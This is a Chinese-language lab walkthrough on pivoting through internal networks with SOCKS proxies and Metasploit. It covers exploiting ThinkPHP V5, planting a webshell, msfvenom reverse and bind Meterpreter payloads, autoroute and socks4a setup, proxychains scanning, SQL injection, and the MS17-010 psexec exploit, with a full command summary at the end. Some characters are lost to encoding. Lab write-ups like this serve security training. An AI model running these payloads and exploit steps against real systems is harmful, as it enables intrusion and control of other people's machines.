域横向内?漫游Socks代理隧道技术

注：遵守网络安全法，任何未经授权的渗透测试行为均属于违法行为

=====================================================

必要基础知识点：

1：什么时候采用代理技术？

代理主要解决?络连通性问题，例如内网1和内网2的通信问题

正向代理 or 反向代理

假如控制端是公?，被控是内?，直接去找在内?被控的是?法找到的。可以让被控端去找控制端（典型反代）

2：代理技术和隧道技术的区别？什么时候会用代理 or 隧道

隧道主要是解决流量分析?具，流量监控?具，防?墙相关过滤

案例分析：

网络架构：

架构分析:攻击IP 192.168.76.132

目标1：双网卡机器 192.168.76.148、192.168.22.129 linux机器

目标2：双网卡机器192.168.22.128/192.168.33.128 Windows机器

目标3：192.168.33.33 Windows机器

利用端口扫描工具 nmap /fscan等 扫描发现目标1机器开放80端口

攻击IP可以直接访问目标机器1，80端口：具体如下所示

访问http://192.168.76.148发现该网站是thinkphp框架，而且是V5版本，直接拿thinkphp漏洞利用工具，漏洞利用成功，

查看web路径，发现当下目录为/www/wwwroot/ThinkPHP/public

执行命令直接写入一句话木马echo ''至当前web目录

利用蚁剑连接webshell

分析：我们需要通过目标机器1 作为跳板去连接目标机器2

利用的方式有很多 可以通过CS，也可以通过MSF

这里 我们使用MSF生成linux木马（因为目标机器2 是linux机器）

同时攻击机kali 开启MSF监听

将生成的linux木马上传至目标机器1并执行

此时kali监听到目标机器1 192.168.76.148的连接。

在msf和cs上有?带的代理

信息收集，获取?卡信息，看是否有内?

除了.76外还有?张.22的?卡，现在?法与他连接

查看路由，看是否和他建?路由规则

当前路由为空，添加路由地址，再次查看路由

此刻，可以和192.168.22.0/24网段进?通信，但只能在msf会话上操作，也就是目前这个连通仅仅是存在MSF 中？无法完成攻击

因为很简单 MSF不可能有你想要的所有功能或者工具，这个时候需要从MSF跳出来利用Kali上的工具，再或者利用个人PC Windows机器完成对目标机器2的访问进而实施攻击

?法攻击。我们可以使?msf在本地开启代理 设置参数 srvport

利用代理工具进行扫描：执行命令 proxychains4 nmap -sT -Pn 192.168.22.128

扫描发现192.168.22.128开放80端口，但是存在问题我们在这里是无法通过浏览器访问，需要配置浏览器访问代理，直接选择SocksV4

访问192.168.22.128 80端口

查看源码 发现存在SQL注入点

根据源码中的SQL注入点 进行SQL注入攻击，得到密码账户

扫描目录，通过robots.txt得到登录地址，登录后台

可以通过后台功能得到Webshell，可以往里面写入Webshell，同时观察网站URL 查找规律

用工具连接后门，推荐蚁剑，主要是因为蚁剑支持代理功能

连接成功

也可以使?Proxifier全局代理?具，

还有SocksCap64进程代理?具。

加载代理，然后将需要代理的程序 在代理隧道中允许

使?msf?成正向后?绑定本机3333端?，然后再去寻找?标机

将??通过websell上传??标主机，msf监听

目标执行木马，MSF上线

得到?络环境，添加路由

此时仅仅还是停留在MSF，我们需要通过代理执行漏洞扫描 （如何添加代理 ？重复之前的操作即可

nmap --script=all

发现目标机器3存在MS17010漏洞，

执行命令：

proxychains4 nmap -Pn -sT 192.168.33.33

use exploit/windows/smb/ms17_010_psexec

set payload windows/meterpreter/bind_tcp

set RHOST 192.168.33.33

exploit

shell

dir /S flag.txt /B

====执行命令汇总========================

1：生成linux木马命令

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.76.132 LPORT=1111 -F elf >t1.elf

2：如何在MSF设置监听

use exploit /multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set lhost 192.168.76.132

set lport 1111

exploit/run

3:信息收集及配置访问(meterpreter中）

获取网络接口： run get_local_subnets

查看路由地址： run autoroute -p

添加路由地址：run autoroute -s 192.168.22.0/24

开启本地代理：use auxiliary/server/socks4a

set srvport 2222

?

exploit

4.利用本地代理接口访问测试

设置浏览器代理进行访问测试

linux

配置proxychains etc/proxychains.conf

socks4 192.168.76.132 2222

proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80

Windows 使用代理工具Proxifier或SocksCap64载入代理进行进程访问测试

利用web漏洞SQL注入获取后台权限，进而获取webshell权限 获取flag

生成正向后门

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf

设置监听

use exploit/multi/handler

set payload linux/x64/meterpreter/bind_tcp

set lhost 192.168.22.128

set lport 3333

exploit